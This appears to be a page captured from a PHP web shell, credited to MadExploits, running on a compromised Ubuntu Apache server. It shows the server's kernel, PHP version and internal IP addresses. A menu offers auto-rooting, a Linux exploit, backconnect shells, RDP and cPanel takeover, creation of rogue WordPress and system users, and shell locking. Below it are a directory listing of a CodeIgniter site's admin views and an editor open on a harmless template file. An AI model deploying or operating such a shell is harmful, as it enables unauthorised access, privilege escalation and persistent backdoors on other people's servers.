Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
admin /
common /
[ HOME SHELL ]
Name
Size
Permission
Action
common-list.php
1.44
KB
-rwxr-x--x
forget-password.php
6.07
KB
-rwxr-x--x
login.php
6.19
KB
-rwxr-x--x
page-header.php
524
B
-rwxr-x--x
profile-content.php
18.09
KB
-rwxr-x--x
profile.php
6.21
KB
-rwxr-x--x
sidebar-left.php
3.83
KB
-rwxr-x--x
sidebar-right.php
546
B
-rwxr-x--x
topbar.php
1.85
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : topbar.php
<div class="logo-container"> <a href="<?=base_url();?>" class="logo" target="_blank"> <img src="<?=$this->config->item('img_url');?>logo.jpg" height="35" alt="<?=$USER_NAME;?>" /> </a> <a href="<?=base_url();?>" class="logo" target="_blank"><span class="headRed" style="color:#AF7969;">FRONT USER SECTION</span></a> <div class="visible-xs toggle-sidebar-left" data-toggle-class="sidebar-left-opened" data-target="html" data-fire-event="sidebar-left-opened"> <i class="fa fa-bars" aria-label="Toggle sidebar"></i> </div> </div> <!-- start: search & user box --> <div class="header-right"> <div id="userbox" class="userbox"> <a href="#" data-toggle="dropdown"> <figure class="profile-picture"> <img src="<?=$this->config->item('img_url');?>logo.jpg" alt="<?=$USER_NAME;?>" class="img-circle" data-lock-picture="<?=$USER_NAME;?>" /> </figure> <div class="profile-info" data-lock-name="<?=$USER_NAME;?>" data-lock-email="<?=$this->session->userdata('dv_EMAIL');?>"> <span class="name"><?=$USER_NAME;?></span> <span class="role"><?=$USER_ROLE;?></span> </div> <i class="fa custom-caret"></i> </a> <div class="dropdown-menu"> <ul class="list-unstyled"> <li class="divider"></li> <li> <a role="menuitem" tabindex="-1" href="<?=site_url(MY_PRO);?>"><i class="fa fa-user"></i><?=$this->lang->line('GL_MY_PROFILE');?></a> </li> <?php /*?> <li> <a role="menuitem" tabindex="-1" href="#" data-lock-screen="true"><i class="fa fa-lock"></i> Lock Screen</a> </li><?php */?> <li> <a role="menuitem" tabindex="-1" href="<?php echo site_url(CL_LOGOUT);?>"><i class="fa fa-power-off"></i><?=$this->lang->line('GL_LOGOUT');?></a> </li> </ul> </div> </div> </div> <!-- end: search & user box -->
Close